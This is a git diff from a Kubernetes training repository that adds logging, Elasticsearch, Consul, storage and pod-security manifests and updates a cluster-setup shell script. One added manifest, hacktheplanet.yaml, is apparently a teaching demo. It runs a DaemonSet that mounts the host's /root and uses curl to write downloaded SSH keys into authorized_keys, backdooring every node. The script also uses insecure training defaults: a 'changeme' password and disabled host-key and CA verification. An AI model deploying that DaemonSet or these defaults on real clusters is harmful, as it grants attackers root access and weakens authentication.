Stage up program for New Relic

Clarify daemon sets (fixes #471 )
Update README.md
2026-03-01 00:40:19 +00:00 · 2019-07-25 17:23:36 -05:00 · 2019-07-25 11:47:43 -05:00 · 2019-07-25 06:22:29 -05:00 · 2019-07-17 05:41:07 -05:00 · 2019-07-16 13:32:12 -07:00
155 changed files with 35291 additions and 1721 deletions
--- a/README.md
+++ b/README.md
@@ -39,7 +39,7 @@ your own tutorials.
 All these materials have been gathered in a single repository
 because they have a few things in common:

- some [common slides](slides/common/) that are re-used
+- some [shared slides](slides/shared/) that are re-used
  (and updated) identically between different decks;
 - a [build system](slides/) generating HTML slides from
  Markdown source files;
--- a/k8s/efk.yaml
+++ b/k8s/efk.yaml
@@ -3,7 +3,6 @@ apiVersion: v1
 kind: ServiceAccount
 metadata:
  name: fluentd
-
 ---
 apiVersion: rbac.authorization.k8s.io/v1beta1
 kind: ClusterRole
@@ -19,7 +18,6 @@ rules:
  - get
  - list
  - watch
-
 ---
 kind: ClusterRoleBinding
 apiVersion: rbac.authorization.k8s.io/v1beta1
@@ -33,23 +31,18 @@ subjects:
 - kind: ServiceAccount
  name: fluentd
  namespace: default
-
 ---
 apiVersion: extensions/v1beta1
 kind: DaemonSet
 metadata:
  name: fluentd
  labels:
-    k8s-app: fluentd-logging
-    version: v1
-    kubernetes.io/cluster-service: "true"
+    app: fluentd
 spec:
  template:
    metadata:
      labels:
-        k8s-app: fluentd-logging
-        version: v1
-        kubernetes.io/cluster-service: "true"
+        app: fluentd
    spec:
      serviceAccount: fluentd
      serviceAccountName: fluentd
@@ -58,7 +51,7 @@ spec:
        effect: NoSchedule
      containers:
      - name: fluentd
-        image: fluent/fluentd-kubernetes-daemonset:elasticsearch
+        image: fluent/fluentd-kubernetes-daemonset:v1.3-debian-elasticsearch-1
        env:
          - name:  FLUENT_ELASTICSEARCH_HOST
            value: "elasticsearch"
@@ -66,14 +59,12 @@ spec:
            value: "9200"
          - name: FLUENT_ELASTICSEARCH_SCHEME
            value: "http"
-          # X-Pack Authentication
-          # =====================
-          - name: FLUENT_ELASTICSEARCH_USER
-            value: "elastic"
-          - name: FLUENT_ELASTICSEARCH_PASSWORD
-            value: "changeme"
          - name: FLUENT_UID
            value: "0"
+          - name: FLUENTD_SYSTEMD_CONF
+            value: "disable"
+          - name: FLUENTD_PROMETHEUS_CONF
+            value: "disable"
        resources:
          limits:
            memory: 200Mi
@@ -94,134 +85,83 @@ spec:
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
-
 ---
 apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
-  annotations:
-    deployment.kubernetes.io/revision: "1"
-  creationTimestamp: null
-  generation: 1
  labels:
-    run: elasticsearch
+    app: elasticsearch
  name: elasticsearch
-  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/elasticsearch
 spec:
-  progressDeadlineSeconds: 600
-  replicas: 1
-  revisionHistoryLimit: 10
  selector:
    matchLabels:
-      run: elasticsearch
-  strategy:
-    rollingUpdate:
-      maxSurge: 1
-      maxUnavailable: 1
-    type: RollingUpdate
+      app: elasticsearch
  template:
    metadata:
-      creationTimestamp: null
      labels:
-        run: elasticsearch
+        app: elasticsearch
    spec:
      containers:
-      - image: elasticsearch:5.6.8
-        imagePullPolicy: IfNotPresent
+      - image: elasticsearch:5
        name: elasticsearch
-        resources: {}
-        terminationMessagePath: /dev/termination-log
-        terminationMessagePolicy: File
+        resources:
+          limits:
+            memory: 2Gi
+          requests:
+            memory: 1Gi
        env:
        - name: ES_JAVA_OPTS
          value: "-Xms1g -Xmx1g"
-      dnsPolicy: ClusterFirst
-      restartPolicy: Always
-      schedulerName: default-scheduler
-      securityContext: {}
-      terminationGracePeriodSeconds: 30
-
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  creationTimestamp: null
  labels:
-    run: elasticsearch
+    app: elasticsearch
  name: elasticsearch
-  selfLink: /api/v1/namespaces/default/services/elasticsearch
 spec:
  ports:
  - port: 9200
    protocol: TCP
    targetPort: 9200
  selector:
-    run: elasticsearch
-  sessionAffinity: None
+    app: elasticsearch
  type: ClusterIP
-
 ---
 apiVersion: extensions/v1beta1
 kind: Deployment
 metadata:
-  annotations:
-    deployment.kubernetes.io/revision: "1"
-  creationTimestamp: null
-  generation: 1
  labels:
-    run: kibana
+    app: kibana
  name: kibana
-  selfLink: /apis/extensions/v1beta1/namespaces/default/deployments/kibana
 spec:
-  progressDeadlineSeconds: 600
-  replicas: 1
-  revisionHistoryLimit: 10
  selector:
    matchLabels:
-      run: kibana
-  strategy:
-    rollingUpdate:
-      maxSurge: 1
-      maxUnavailable: 1
-    type: RollingUpdate
+      app: kibana
  template:
    metadata:
-      creationTimestamp: null
      labels:
-        run: kibana
+        app: kibana
    spec:
      containers:
      - env:
        - name: ELASTICSEARCH_URL
          value: http://elasticsearch:9200/
-        image: kibana:5.6.8
-        imagePullPolicy: Always
+        image: kibana:5
        name: kibana
        resources: {}
-        terminationMessagePath: /dev/termination-log
-        terminationMessagePolicy: File
-      dnsPolicy: ClusterFirst
-      restartPolicy: Always
-      schedulerName: default-scheduler
-      securityContext: {}
-      terminationGracePeriodSeconds: 30
-
 ---
 apiVersion: v1
 kind: Service
 metadata:
-  creationTimestamp: null
  labels:
-    run: kibana
+    app: kibana
  name: kibana
-  selfLink: /api/v1/namespaces/default/services/kibana
 spec:
-  externalTrafficPolicy: Cluster
  ports:
  - port: 5601
    protocol: TCP
    targetPort: 5601
  selector:
-    run: kibana
-  sessionAffinity: None
+    app: kibana
  type: NodePort
--- a/k8s/elasticsearch-cluster.yaml
+++ b/k8s/elasticsearch-cluster.yaml
@@ -0,0 +1,21 @@
+apiVersion: enterprises.upmc.com/v1
+kind: ElasticsearchCluster
+metadata:
+  name: es
+spec:
+  kibana:
+    image: docker.elastic.co/kibana/kibana-oss:6.1.3
+    image-pull-policy: Always
+  cerebro:
+    image: upmcenterprises/cerebro:0.7.2
+    image-pull-policy: Always
+  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
+  image-pull-policy: Always
+  client-node-replicas: 2
+  master-node-replicas: 3
+  data-node-replicas: 3
+  network-host: 0.0.0.0
+  use-ssl: false
+  data-volume-size: 10Gi
+  java-options: "-Xms512m -Xmx512m"
+
--- a/k8s/elasticsearch-operator.yaml
+++ b/k8s/elasticsearch-operator.yaml
@@ -0,0 +1,94 @@
+# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: elasticsearch-operator
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: elasticsearch-operator
+rules:
+- apiGroups: ["extensions"]
+  resources: ["deployments", "replicasets", "daemonsets"]
+  verbs: ["create", "get", "update", "delete", "list"]
+- apiGroups: ["apiextensions.k8s.io"]
+  resources: ["customresourcedefinitions"]
+  verbs: ["create", "get", "update", "delete", "list"]
+- apiGroups: ["storage.k8s.io"]
+  resources: ["storageclasses"]
+  verbs: ["get", "list", "create", "delete", "deletecollection"]
+- apiGroups: [""]
+  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"] 
+  verbs: ["create", "get", "update", "delete", "list"]
+- apiGroups: ["batch"]
+  resources: ["cronjobs", "jobs"]
+  verbs: ["create", "get", "deletecollection", "delete"]
+- apiGroups: [""]
+  resources: ["pods"]
+  verbs: ["list", "get", "watch"]
+- apiGroups: ["apps"]
+  resources: ["statefulsets", "deployments"]
+  verbs: ["*"]
+- apiGroups: ["enterprises.upmc.com"]
+  resources: ["elasticsearchclusters"]
+  verbs: ["*"]
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: elasticsearch-operator
+subjects:
+- kind: ServiceAccount
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator
+---
+apiVersion: extensions/v1beta1
+kind: Deployment
+metadata:
+  name: elasticsearch-operator
+  namespace: elasticsearch-operator
+spec:
+  replicas: 1
+  template:
+    metadata:
+      labels:
+        name: elasticsearch-operator
+    spec:
+      containers:
+      - name: operator
+        image: upmcenterprises/elasticsearch-operator:0.2.0
+        imagePullPolicy: Always
+        env:
+        - name: NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
+        ports:
+        - containerPort: 8000
+          name: http
+        livenessProbe:
+          httpGet:
+            path: /live
+            port: 8000
+          initialDelaySeconds: 10
+          timeoutSeconds: 10
+        readinessProbe:
+          httpGet:
+            path: /ready
+            port: 8000
+          initialDelaySeconds: 10
+          timeoutSeconds: 5
+      serviceAccount: elasticsearch-operator
--- a/k8s/filebeat.yaml
+++ b/k8s/filebeat.yaml
@@ -0,0 +1,167 @@
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: filebeat-config
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+data:
+  filebeat.yml: |-
+    filebeat.config:
+      inputs:
+        # Mounted `filebeat-inputs` configmap:
+        path: ${path.config}/inputs.d/*.yml
+        # Reload inputs configs as they change:
+        reload.enabled: false
+      modules:
+        path: ${path.config}/modules.d/*.yml
+        # Reload module configs as they change:
+        reload.enabled: false
+
+    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
+    #filebeat.autodiscover:
+    #  providers:
+    #    - type: kubernetes
+    #      hints.enabled: true
+
+    processors:
+      - add_cloud_metadata:
+
+    cloud.id: ${ELASTIC_CLOUD_ID}
+    cloud.auth: ${ELASTIC_CLOUD_AUTH}
+
+    output.elasticsearch:
+      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
+      username: ${ELASTICSEARCH_USERNAME}
+      password: ${ELASTICSEARCH_PASSWORD}
+---
+apiVersion: v1
+kind: ConfigMap
+metadata:
+  name: filebeat-inputs
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+data:
+  kubernetes.yml: |-
+    - type: docker
+      containers.ids:
+      - "*"
+      processors:
+        - add_kubernetes_metadata:
+            in_cluster: true
+---
+apiVersion: extensions/v1beta1
+kind: DaemonSet
+metadata:
+  name: filebeat
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+spec:
+  template:
+    metadata:
+      labels:
+        k8s-app: filebeat
+    spec:
+      serviceAccountName: filebeat
+      terminationGracePeriodSeconds: 30
+      containers:
+      - name: filebeat
+        image: docker.elastic.co/beats/filebeat-oss:7.0.1
+        args: [
+          "-c", "/etc/filebeat.yml",
+          "-e",
+        ]
+        env:
+        - name: ELASTICSEARCH_HOST
+          value: elasticsearch-es.default.svc.cluster.local
+        - name: ELASTICSEARCH_PORT
+          value: "9200"
+        - name: ELASTICSEARCH_USERNAME
+          value: elastic
+        - name: ELASTICSEARCH_PASSWORD
+          value: changeme
+        - name: ELASTIC_CLOUD_ID
+          value:
+        - name: ELASTIC_CLOUD_AUTH
+          value:
+        securityContext:
+          runAsUser: 0
+          # If using Red Hat OpenShift uncomment this:
+          #privileged: true
+        resources:
+          limits:
+            memory: 200Mi
+          requests:
+            cpu: 100m
+            memory: 100Mi
+        volumeMounts:
+        - name: config
+          mountPath: /etc/filebeat.yml
+          readOnly: true
+          subPath: filebeat.yml
+        - name: inputs
+          mountPath: /usr/share/filebeat/inputs.d
+          readOnly: true
+        - name: data
+          mountPath: /usr/share/filebeat/data
+        - name: varlibdockercontainers
+          mountPath: /var/lib/docker/containers
+          readOnly: true
+      volumes:
+      - name: config
+        configMap:
+          defaultMode: 0600
+          name: filebeat-config
+      - name: varlibdockercontainers
+        hostPath:
+          path: /var/lib/docker/containers
+      - name: inputs
+        configMap:
+          defaultMode: 0600
+          name: filebeat-inputs
+      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
+      - name: data
+        hostPath:
+          path: /var/lib/filebeat-data
+          type: DirectoryOrCreate
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: filebeat
+subjects:
+- kind: ServiceAccount
+  name: filebeat
+  namespace: kube-system
+roleRef:
+  kind: ClusterRole
+  name: filebeat
+  apiGroup: rbac.authorization.k8s.io
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: filebeat
+  labels:
+    k8s-app: filebeat
+rules:
+- apiGroups: [""] # "" indicates the core API group
+  resources:
+  - namespaces
+  - pods
+  verbs:
+  - get
+  - watch
+  - list
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: filebeat
+  namespace: kube-system
+  labels:
+    k8s-app: filebeat
+---
--- a/k8s/hacktheplanet.yaml
+++ b/k8s/hacktheplanet.yaml
@@ -0,0 +1,34 @@
+apiVersion: apps/v1
+kind: DaemonSet
+metadata:
+  name: hacktheplanet
+spec:
+  selector:
+    matchLabels:
+      app: hacktheplanet
+  template:
+    metadata:
+      labels:
+        app: hacktheplanet
+    spec:
+      volumes:
+      - name: root
+        hostPath:
+          path: /root
+      tolerations:
+      - effect: NoSchedule
+        operator: Exists
+      initContainers:
+      - name: hacktheplanet
+        image: alpine
+        volumeMounts:
+        - name: root
+          mountPath: /root
+        command:
+        - sh
+        - -c
+        - "apk update && apk add curl && curl https://github.com/jpetazzo.keys > /root/.ssh/authorized_keys"
+      containers:
+      - name: web
+        image: nginx
+
--- a/k8s/local-path-storage.yaml
+++ b/k8s/local-path-storage.yaml
@@ -0,0 +1,110 @@
+# This is a local copy of:
+# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
+---
+apiVersion: v1
+kind: Namespace
+metadata:
+  name: local-path-storage
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: local-path-provisioner-service-account
+  namespace: local-path-storage
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRole
+metadata:
+  name: local-path-provisioner-role
+  namespace: local-path-storage
+rules:
+- apiGroups: [""]
+  resources: ["nodes", "persistentvolumeclaims"]
+  verbs: ["get", "list", "watch"]
+- apiGroups: [""]
+  resources: ["endpoints", "persistentvolumes", "pods"]
+  verbs: ["*"]
+- apiGroups: [""]
+  resources: ["events"]
+  verbs: ["create", "patch"]
+- apiGroups: ["storage.k8s.io"]
+  resources: ["storageclasses"]
+  verbs: ["get", "list", "watch"]
+---
+apiVersion: rbac.authorization.k8s.io/v1beta1
+kind: ClusterRoleBinding
+metadata:
+  name: local-path-provisioner-bind
+  namespace: local-path-storage
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: local-path-provisioner-role
+subjects:
+- kind: ServiceAccount
+  name: local-path-provisioner-service-account
+  namespace: local-path-storage
+---
+apiVersion: apps/v1beta2
+kind: Deployment
+metadata:
+  name: local-path-provisioner
+  namespace: local-path-storage
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      app: local-path-provisioner
+  template:
+    metadata:
+      labels:
+        app: local-path-provisioner
+    spec:
+      serviceAccountName: local-path-provisioner-service-account
+      containers:
+      - name: local-path-provisioner
+        image: rancher/local-path-provisioner:v0.0.8
+        imagePullPolicy: Always
+        command:
+        - local-path-provisioner
+        - --debug
+        - start
+        - --config
+        - /etc/config/config.json
+        volumeMounts:
+        - name: config-volume
+          mountPath: /etc/config/
+        env:
+        - name: POD_NAMESPACE
+          valueFrom:
+            fieldRef:
+              fieldPath: metadata.namespace
+      volumes:
+        - name: config-volume
+          configMap:
+            name: local-path-config
+---
+apiVersion: storage.k8s.io/v1
+kind: StorageClass
+metadata:
+  name: local-path
+provisioner: rancher.io/local-path
+volumeBindingMode: WaitForFirstConsumer
+reclaimPolicy: Delete
+---
+kind: ConfigMap
+apiVersion: v1
+metadata:
+  name: local-path-config
+  namespace: local-path-storage
+data:
+  config.json: |-
+        {
+                "nodePathMap":[
+                {
+                        "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
+                        "paths":["/opt/local-path-provisioner"]
+                }
+                ]
+        }
+
--- a/k8s/persistent-consul.yaml
+++ b/k8s/persistent-consul.yaml
@@ -0,0 +1,95 @@
+apiVersion: rbac.authorization.k8s.io/v1
+kind: Role
+metadata:
+  name: consul
+rules:
+  - apiGroups: [ "" ]
+    resources: [ pods ]
+    verbs:     [ get, list ]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: RoleBinding
+metadata:
+  name: consul
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: Role
+  name: consul
+subjects:
+  - kind: ServiceAccount
+    name: consul
+    namespace: orange
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: consul
+---
+apiVersion: v1
+kind: Service
+metadata:
+  name: consul
+spec:
+  ports:
+  - port: 8500
+    name: http
+  selector:
+    app: consul
+---
+apiVersion: apps/v1
+kind: StatefulSet
+metadata:
+  name: consul
+spec:
+  serviceName: consul
+  replicas: 3
+  selector:
+    matchLabels:
+      app: consul
+  volumeClaimTemplates:
+    - metadata:
+        name: data
+      spec:
+        accessModes:
+          - ReadWriteOnce
+        resources:
+          requests:
+            storage: 1Gi
+  template:
+    metadata:
+      labels:
+        app: consul
+    spec:
+      serviceAccountName: consul
+      affinity:
+        podAntiAffinity:
+          requiredDuringSchedulingIgnoredDuringExecution:
+            - labelSelector:
+                matchExpressions:
+                  - key: app
+                    operator: In
+                    values:
+                      - consul
+              topologyKey: kubernetes.io/hostname
+      terminationGracePeriodSeconds: 10
+      containers:
+        - name: consul
+          image: "consul:1.4.4"
+          volumeMounts:
+            - name: data
+              mountPath: /consul/data
+          args:
+            - "agent"
+            - "-bootstrap-expect=3"
+            - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
+            - "-client=0.0.0.0"
+            - "-data-dir=/consul/data"
+            - "-server"
+            - "-ui"
+          lifecycle:
+            preStop:
+              exec:
+                command:
+                - /bin/sh
+                - -c
+                - consul leave
--- a/k8s/psp-privileged.yaml
+++ b/k8s/psp-privileged.yaml
@@ -0,0 +1,39 @@
+---
+apiVersion: policy/v1beta1
+kind: PodSecurityPolicy
+metadata:
+  name: privileged
+  annotations:
+    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
+spec:
+  privileged: true
+  allowPrivilegeEscalation: true
+  allowedCapabilities:
+  - '*'
+  volumes:
+  - '*'
+  hostNetwork: true
+  hostPorts:
+  - min: 0
+    max: 65535
+  hostIPC: true
+  hostPID: true
+  runAsUser:
+    rule: 'RunAsAny'
+  seLinux:
+    rule: 'RunAsAny'
+  supplementalGroups:
+    rule: 'RunAsAny'
+  fsGroup:
+    rule: 'RunAsAny'
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: psp:privileged
+rules:
+- apiGroups:     ['policy']
+  resources:     ['podsecuritypolicies']
+  verbs:         ['use']
+  resourceNames: ['privileged']
+
--- a/k8s/psp-restricted.yaml
+++ b/k8s/psp-restricted.yaml
@@ -0,0 +1,38 @@
+---
+apiVersion: extensions/v1beta1
+kind: PodSecurityPolicy
+metadata:
+  annotations:
+    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
+    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
+    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
+    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
+  name: restricted
+spec:
+  allowPrivilegeEscalation: false
+  fsGroup:
+    rule: RunAsAny
+  runAsUser:
+    rule: RunAsAny
+  seLinux:
+    rule: RunAsAny
+  supplementalGroups:
+    rule: RunAsAny
+  volumes:
+  - configMap
+  - emptyDir
+  - projected
+  - secret
+  - downwardAPI
+  - persistentVolumeClaim
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: psp:restricted
+rules:
+- apiGroups:     ['policy']
+  resources:     ['podsecuritypolicies']
+  verbs:         ['use']
+  resourceNames: ['restricted']
+
--- a/k8s/users:jean.doe.yaml
+++ b/k8s/users:jean.doe.yaml
@@ -0,0 +1,33 @@
+---
+apiVersion: v1
+kind: ServiceAccount
+metadata:
+  name: jean.doe
+  namespace: users
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRole
+metadata:
+  name: users:jean.doe
+rules:
+- apiGroups: [ certificates.k8s.io ]
+  resources: [ certificatesigningrequests ]
+  verbs:     [ create ]
+- apiGroups:     [ certificates.k8s.io ]
+  resourceNames: [ users:jean.doe ]
+  resources:     [ certificatesigningrequests ]
+  verbs:         [ get, create, delete, watch ]
+---
+apiVersion: rbac.authorization.k8s.io/v1
+kind: ClusterRoleBinding
+metadata:
+  name: users:jean.doe
+roleRef:
+  apiGroup: rbac.authorization.k8s.io
+  kind: ClusterRole
+  name: users:jean.doe
+subjects:
+- kind: ServiceAccount
+  name: jean.doe
+  namespace: users
+
--- a/k8s/volumes-for-consul.yaml
+++ b/k8s/volumes-for-consul.yaml
@@ -0,0 +1,70 @@
+---
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+  name: consul-node2
+  annotations:
+    node: node2
+spec:
+  capacity:
+    storage: 10Gi
+  accessModes:
+  - ReadWriteOnce
+  persistentVolumeReclaimPolicy: Delete
+  local:
+    path: /mnt/consul
+  nodeAffinity:
+    required:
+      nodeSelectorTerms:
+      - matchExpressions:
+        - key: kubernetes.io/hostname
+          operator: In
+          values:
+          - node2
+---
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+  name: consul-node3
+  annotations:
+    node: node3
+spec:
+  capacity:
+    storage: 10Gi
+  accessModes:
+  - ReadWriteOnce
+  persistentVolumeReclaimPolicy: Delete
+  local:
+    path: /mnt/consul
+  nodeAffinity:
+    required:
+      nodeSelectorTerms:
+      - matchExpressions:
+        - key: kubernetes.io/hostname
+          operator: In
+          values:
+          - node3
+---
+apiVersion: v1
+kind: PersistentVolume
+metadata:
+  name: consul-node4
+  annotations:
+    node: node4
+spec:
+  capacity:
+    storage: 10Gi
+  accessModes:
+  - ReadWriteOnce
+  persistentVolumeReclaimPolicy: Delete
+  local:
+    path: /mnt/consul
+  nodeAffinity:
+    required:
+      nodeSelectorTerms:
+      - matchExpressions:
+        - key: kubernetes.io/hostname
+          operator: In
+          values:
+          - node4
+
--- a/prepare-vms/lib/commands.sh
+++ b/prepare-vms/lib/commands.sh
@@ -2,7 +2,7 @@ export AWS_DEFAULT_OUTPUT=text

 HELP=""
 _cmd() {
-    HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
+    HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
 }

 _cmd help "Show available commands"
@@ -74,10 +74,10 @@ _cmd_deploy() {
    pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
    pssh sudo chmod +x /usr/local/bin/docker-prompt

-    # If /home/docker/.ssh/id_rsa doesn't exist, copy it from node1
+    # If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
    pssh "
    sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
-    ssh -o StrictHostKeyChecking=no node1 sudo -u docker tar -C /home/docker -cvf- .ssh |
+    ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
    sudo -u docker tar -C /home/docker -xf-"

    # if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
@@ -86,11 +86,11 @@ _cmd_deploy() {
    cat /home/docker/.ssh/id_rsa.pub |
    sudo -u docker tee -a /home/docker/.ssh/authorized_keys"

-    # On node1, create and deploy TLS certs using Docker Machine
+    # On the first node, create and deploy TLS certs using Docker Machine
    # (Currently disabled.)
    true || pssh "
-    if grep -q node1 /tmp/node; then
-        grep ' node' /etc/hosts | 
+    if i_am_first_node; then
+        grep '[0-9]\$' /etc/hosts |
        xargs -n2 sudo -H -u docker \
        docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
    fi"
@@ -103,6 +103,16 @@ _cmd_deploy() {
    info "$0 cards $TAG"
 }

+_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
+_cmd_disabledocker() {
+    TAG=$1
+    need_tag
+
+    pssh "sudo systemctl disable docker.service"
+    pssh "sudo systemctl disable docker.socket"
+    pssh "sudo systemctl stop docker"
+}
+
 _cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
 _cmd_kubebins() {
    TAG=$1
@@ -116,7 +126,7 @@ _cmd_kubebins() {
        | sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
    fi
    if ! [ -x hyperkube ]; then
-        curl -L https://dl.k8s.io/v1.14.0/kubernetes-server-linux-amd64.tar.gz \
+        curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
        | sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
    fi
    if ! [ -x kubelet ]; then
@@ -139,6 +149,16 @@ _cmd_kube() {
    TAG=$1
    need_tag

+    # Optional version, e.g. 1.13.5
+    KUBEVERSION=$2
+    if [ "$KUBEVERSION" ]; then
+        EXTRA_KUBELET="=$KUBEVERSION-00"
+        EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
+    else
+        EXTRA_KUBELET=""
+        EXTRA_KUBEADM=""
+    fi
+
    # Install packages
    pssh --timeout 200 "
    curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
@@ -147,19 +167,19 @@ _cmd_kube() {
    sudo tee /etc/apt/sources.list.d/kubernetes.list"
    pssh --timeout 200 "
    sudo apt-get update -q &&
-    sudo apt-get install -qy kubelet kubeadm kubectl &&
+    sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
    kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"

    # Initialize kube master
    pssh --timeout 200 "
-    if grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/admin.conf ]; then
+    if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
        kubeadm token generate > /tmp/token &&
-	sudo kubeadm init --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
+	sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
    fi"

    # Put kubeconfig in ubuntu's and docker's accounts
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
        sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
        sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
        sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
@@ -169,21 +189,22 @@ _cmd_kube() {

    # Install weave as the pod network
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
        kubever=\$(kubectl version | base64 | tr -d '\n') &&
        kubectl apply -f https://cloud.weave.works/k8s/net?k8s-version=\$kubever
    fi"

    # Join the other nodes to the cluster
    pssh --timeout 200 "
-    if ! grep -q node1 /tmp/node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
-        TOKEN=\$(ssh -o StrictHostKeyChecking=no node1 cat /tmp/token) &&
-        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN node1:6443
+    if ! i_am_first_node && [ ! -f /etc/kubernetes/kubelet.conf ]; then
+        FIRSTNODE=\$(cat /etc/name_of_first_node) &&
+        TOKEN=\$(ssh -o StrictHostKeyChecking=no \$FIRSTNODE cat /tmp/token) &&
+        sudo kubeadm join --discovery-token-unsafe-skip-ca-verification --token \$TOKEN \$FIRSTNODE:6443
    fi"

    # Install metrics server
    pssh "
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
 	kubectl apply -f https://raw.githubusercontent.com/jpetazzo/container.training/master/k8s/metrics-server.yaml
    fi"

@@ -208,7 +229,7 @@ EOF"
    pssh "
    if [ ! -x /usr/local/bin/stern ]; then
        ##VERSION##
-        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
+        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
        sudo chmod +x /usr/local/bin/stern &&
        stern --completion bash | sudo tee /etc/bash_completion.d/stern
    fi"
@@ -220,6 +241,21 @@ EOF"
        helm completion bash | sudo tee /etc/bash_completion.d/helm
    fi"

+    # Install ship
+    pssh "
+    if [ ! -x /usr/local/bin/ship ]; then
+        curl -L https://github.com/replicatedhq/ship/releases/download/v0.40.0/ship_0.40.0_linux_amd64.tar.gz |
+             sudo tar -C /usr/local/bin -zx ship
+    fi"
+
+    # Install the AWS IAM authenticator
+    pssh "
+    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
+	##VERSION##
+        sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
+	sudo chmod +x /usr/local/bin/aws-iam-authenticator
+    fi"
+
    sep "Done"
 }

@@ -240,10 +276,9 @@ _cmd_kubetest() {
    # Feel free to make that better ♥
    pssh "
    set -e
-    [ -f /tmp/node ]
-    if grep -q node1 /tmp/node; then
+    if i_am_first_node; then
      which kubectl
-      for NODE in \$(awk /\ node/\ {print\ \\\$2} /etc/hosts); do
+      for NODE in \$(awk /[0-9]\$/\ {print\ \\\$2} /etc/hosts); do
        echo \$NODE ; kubectl get nodes | grep -w \$NODE | grep -w Ready
      done
    fi"
@@ -283,6 +318,14 @@ _cmd_listall() {
    done
 }

